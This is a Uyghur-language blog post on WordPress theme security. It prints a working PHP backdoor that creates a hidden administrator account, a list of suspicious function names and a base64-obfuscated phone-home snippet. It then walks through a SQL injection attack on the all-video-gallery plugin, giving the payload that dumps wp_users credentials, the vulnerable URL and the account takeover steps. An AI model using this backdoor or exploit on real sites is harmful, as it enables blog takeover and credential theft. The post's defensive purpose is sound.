تەشنا تېخنىكا كۇلۇبى

WordPress بىلەن ئېتىشىۋاتقانلارغا ئايانكى مەزكۇر بلوگ سېستىمىسىغا ئائىت مەزمۇنلار تور دۇنياسىدا ھەقىقەتەن مول بولۇپلا قالماي، نۇرغۇن ئۇسلۇبلىرى ئاساسەن ھەقسىز. ھەقسىز بولمىغاندىمۇ باشقىلار تەرىپىدىن ھەقسىز تارقىتىۋېتىلگەن بولىدۇ. خوش، ئۇنداقتا ئەسلى نۇسخىسى ھەقلىق بولغان، بىراۋلار تەرىپىدىن يېشىۋىتىلىپ، ھەقسىزلەشتۈرىۋېتىلگەن ئاشۇ ئۇسلۇبلار راستىنلا "ھەقسىز"مۇ؟

[t]بىلوگ بىخەتەرلىكى ھەققىدە تاققا - تۇققا[/t]
ئەمەلىيەتتە پۈتۈنلەي ھەقسىز دېگىلى بولمايدۇ. بەزى ئۇسلۇبلارغا تارقاتقۇچىنىڭ تور بېتىگە زىيارەت مىقدارى ئاشۇرۇپ بېرىدىغان ئەسكى كود، بەزىلىرىگە شۇ ئۇسلۇبنى ئىشلەتكۈچىلەرنىڭ ھەرقانداق بلوگ ئۇچۇرلىرىنى خالىغانچە ئۆزگەرتىۋىتەلەيدىغان ئەجەللىك يوچۇق قالدۇرغان بولىشى مومكىن، مومكىنلا ئەمەس تامامەن مومكىن! مەسىلەن تۆۋەندىكى نەچچە قۇر كودقا قارايلى:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( ! username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd! ' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

ئۇسلۇبنىڭ مەلۇم يىرىگە مۇشۇ كودنى قويۇپ قويسىلا بلوگىڭىزغا قوللانچى نامى backdoor پارولى pa55w0rd! سالاھىتى administrator(باشقۇرغۇچى) بولغان يېڭى ئەزا قوشىدۇ - دە، ئۇچۇرلار بىلەن بىلوگىڭىزنىڭ ئارقا بېتىگە خالىغان ۋاقىتتا كىرەلەيدۇ، كىرىپلا سىزنىڭ ئۇچۇرلىرىڭىزنى ئۆزگەرتىۋالسا بلوگ بىراۋلارنىڭ بولۇپ كېتىدۇ، ھاھا. . . بوشلۇق ۋە تور نامنى دەمسىز؟ بلوگ ئارقا بەت ئۇچۇرلىرىغا ئىرىشكەندىكىن ئۇ ئۇچۇرلارغا ئىرىشىش بىردەملىكلا ئىش. ئەلۋەتتە يامان نىيەتلىك كىشىلەر ھەرگىزمۇ يۇقىرىقى كودلاردەك ئوچۇقلا قويۇپ قويمايدۇ، ئاۋۇ ئىسىملىرىنى دېققىتىڭىزنى تارتمىغۇدەك دەرىجىدە ياسايدۇ، يامىنى كەلسە فورماتلاپ ئاندىن تاشلاپ قويىدۇ.
ئۇنىڭدىن باشقا تۆۋەندىكى ئەسكى كودلارنىمۇ كۆرۈپ باقايلى، ئۇسلۇبىڭىزنىڭ ھەرقانداق يىرىدە تۆۋەندىكىدەك فونكىسىيەلەر بولسا، ئۇسلۇبىڭىزنى چۆرىۋەتسىڭىز ياكى بىخەتەرلىك تەكشۈرۈشنى باشلىۋەتسىڭىز بولىدۇ:

function _checkactive_widgets ،  function _checkactive_widgets
function _get_allwidgets_cont
function stripos
function strripos
function scandir
add_action("admin_head", "_checkactive_widgets");
function _getprepare_widget
add_action("init", "_getprepare_widget");
function __popular_posts

يۇقىرىقى كود ئۇسلۇبىڭىزنىڭ function.php ھۆججىتى ئىچىدە كۆرۈلۈش ئىھتىماللىقى چوڭراق.
تۆۋەندىكىسى مەلۇم بىر ھەقسىز ئۇسلۇبتا كۆپ كۆرۈلگەن كودلاردىن بولۇپ، گەرچە بىخەتەرلىك جەھەتتىن خەتىرى بولمىسىمۇ، ئۇسلۇب ئاپتورى نەشىر يىڭىلاش ئۇقتۇرۇشى يەتكۈزۈش، ئۇسلۇبنىڭ ئۆزگەرتىلىش ھالىتىنى كۆزىتىش . . . دېگەندەك مەقسەتلەرگە يىتىش ئۈچۈن ئىشلىتىدۇ. چىقىرىپ تاشلىماسلىقىمىز ئۈچۈن base64 ھالىتىدە فورماتلاپ قويىدۇ:

add_action( 'admin_notices', 'action_admin_notice_update' );
function action_admin_notice_update() {
    global $my_theme;
    $version=@fopen(base64_decode('aHR0cDovL3d3dy5xcW9xLm5ldC92ZXJzaW9uLnBocA=='),"r");
    $ver=@fgets($version);
    @fclose($version);
    if((int)$my_theme->Version < (int)$ver){
        echo "
".base64_decode('57O757uf5qOA5rWL5Yiw5Li76aKY5bey5pu05paw5Yiw77ya'). $ver.base64_decode('54mI5pys77yMIOivt+iBlOezuzxhIGhyZWY9J2h0dHA6Ly93d3cucXFvcS5uZXQnPiDkvZzogIUgPC9hPuabtOaWsO+8jOasoui/juWKoOWFpVFR576k6K6o6K6677yaMjkzNzcwODczPC9kaXY+');
    }
}

ئەلۋەتتە" ھەرقانداق كېسەلنىڭ داۋاسى بار" دېگەندەك، ئۇسلۇبلىرىمىزدا ئەسكى كودنىڭ بار - يوقلىنى بىر - بىرلەپ قولىمىزدە تەكشۈرسەكمۇ، ياكى بىخەتەرلىك تەكشۈرۈش قىستۇرمىلىرى بىلەن تەكشۈرسەكمۇ بولىدۇ. بۇ يەردە مەن بىر قىستۇرما تەۋسىيە قىلاي: TAC
[t]تۆۋەندە مىسال ئۈچۈن ئاددىيلا بىر بلوگ خاككىرلىق ھۇجۇمى ئويناپ قويايلى[/t]
1- قەدەم: wordpress تىكى يوچۇقلارنى تاپايلى.
بىلوگدا يوچۇق بار - يوقلىقىنى بىلمەكچى بولساق چوقۇم بارلىق ئۇسلۇب ۋە قىستۇرما كودلىرىدا بىۋاسىتە ھالدا SQL ئىزدەش بۇيرۇقى(Query) نىڭ ئىشلىتىلىش ئەھۋالىغا قاراش كېرەك(بۇنىڭ ئۈچۈن ھۇجۇم نىشاندىكى بلوگنىڭ ئۇسلۇبىنى ۋە ئىشلىتىش ئېھتىمالى بولغان قىستۇرمىلىرىنى تەكشۈرسەكلا بولىدۇ). ئەگەر شۇنداق ئىزدەش بۇيرۇقى ئىشلىتىلگەن بولسا بىرلىككە كەلگەن ساندان تەكشۈرۈش بۇيرۇقى ئارقىلىق wordpress ساندانىدىكىwp_users جەدىۋىلىنى ئۆتمۈتۆشۈك قىلىۋىتىمىز(چاقچاق - ھە). مىسالىي كود تۆۋەندە:

-1 union Select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

يۇقىرىقى كود شەكلى ئارقىلىق سانداندىكى باشقۇرغۇچى ئېلىخىتىگە ئىرىشىمىز. تۆۋەندە بىز all-video-gallery قىستۇرمىسنى مىسال ئالايلى: بۇ قىستۇرمىغا تۆۋەندىكىدەك ساندان جۈملىسى ئىشلەتكەچكە خىل قىستۇرمىنى قاچىلىغان بلوگلار خاككىرلارنىڭ كونا تاملىقىغا ئايلىنىپ قالغان:

"SELECT * FROM ". $wpdb->prefix. "allvideogallery_profiles WHERE id=". $_pid

مەزكۇر كودتا پىروگراممىر دىققەت قىلماستىن $_pid نى ھېچقانداق چەكلىمىسىز بىۋاسىتە ئىشلەتكەن، شۇنىڭ بىلەن بىز:

http://{Domain_Name_Here}/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid={union Query here}

مونۇ url ئارقىلىق زىيارەت قىلىپلا تۆۋەندىكى رەسىمدەك باشقۇرغۇچى ئۇچۇرلىرىغا ئىرىشىمىز.

2 - قەدەم: wordpress ئۇچۇرلىرىنى ئۆزگەرتىش
يۇقىرىقىدەك باشقۇرغۇچى ئېلىختىگە ئىرىشكەندىن كېيىن بلوگنىڭ كىرىش بېتىگە بېرىپ، "پارولنى ئۇنۇتتىڭىزمۇ؟ " نى باسىمىز - دە، يۇقاردا قولغا چۈشۈرگەن ئېلىخەتنى تولدۇرىمىز، شۇھامان ئېلىخەتكە يېڭى پارول يوللىنىدۇ. يېڭى پارولنىمۇ يۇقاردا بىز تىلغا ئالغان url ئۇسسۇلى ئارقىلىق زىيارەت قىلىپ كۆرىۋالالايمىز. مەسىلەن تۆۋەندىكى رەسىمدەك:

3- قەدەم: بلوگنى ئۆتكۈزىۋېلىش
يۇقارقىدا ئېرىشكەن پارول ئارقىلىق ئارقا بەتكە كىرىپ ئۇچۇرلارنى ئۆزگەرتسەكلا بلوگ بىزگە مەنسۇپ بولىدۇ. ئاندىن دەرھال confing.php دىكى ئۇچۇرلار ئارقىلىق، بوشلۇق ۋە سانداننىمۇ ئۆتكۈزىۋالساق بولىدۇ. تامام!
يۇقارقىلار ئىنتايىن ئاددىي بولغان بىر ئۇسسۇل خالاس، ئەمەلىيەتتە خاككېرلار بلوگقا ھۇجۇم قىلىش نىيىتىدە بولسا ئىنتايىن ئاسانلا بىر تەرەپ قىلىۋىتىدۇ. بۇ يازما ئارقىلىق ئاخىردا بىخەتەرلىك ئۈچۈن تەۋسىيە:
1. مۇقىم بلوگ قۇرۇش نېيىتىڭىز بولسا ئامال بار ئاتالمىش "ھەقسىز" ئۇسلۇبلارغا دۈم چۈشمەڭ، ئەھۋالىڭىزغا قاراپ باشقىلارنىڭ ئىجادىيىتى بولغان ئۇسلۇبلارنى مۇۋاپىق ھەق بىلەن سېتىۋىلىپ ئىشلەتسىڭىز بولىدۇ.
2. قىستۇرما ئىشلەتكەندە ئامال بار ئورگان بەتتىن چۈشۈرۈپ ئىشلىتىڭ، باشقىلار تور دېسكىلىرىغا يوللاپ قويغان قىستۇرمىلاردىن ھەزەر ئەيلەڭ.
3. باشقۇرغۇچى ئېلىختىڭىزگە سەل قارىماڭ، ئۇچۇرلىرىڭىزنى ئۆزگەرتىپ تۇرۇشنى ئۇنۇتماڭ.
4. ئامال بار ئۇسلۇبىڭىزنىڭ بارلىق ھۆججەتلىرى ۋە رولىنى يۈزەكىي بولسىمۇ چۈشۈنۈپ چىقىڭ، ئەگەر كەسپىي بلوگگىر بولمىسىڭىز ئەلۋەتتە بىزنىڭ مۇلازىمىتىزنى سىتېۋىلىڭ(http://menzil.cn/)، ئەرزان باھا، ئىشەنچىلىك پۈتتۈرۈپ، باشقۇرۇپ بېرىمىز. (ھاھا، ئېلان بېرىشنى ئۈگىنىۋالدىم مەنمۇ)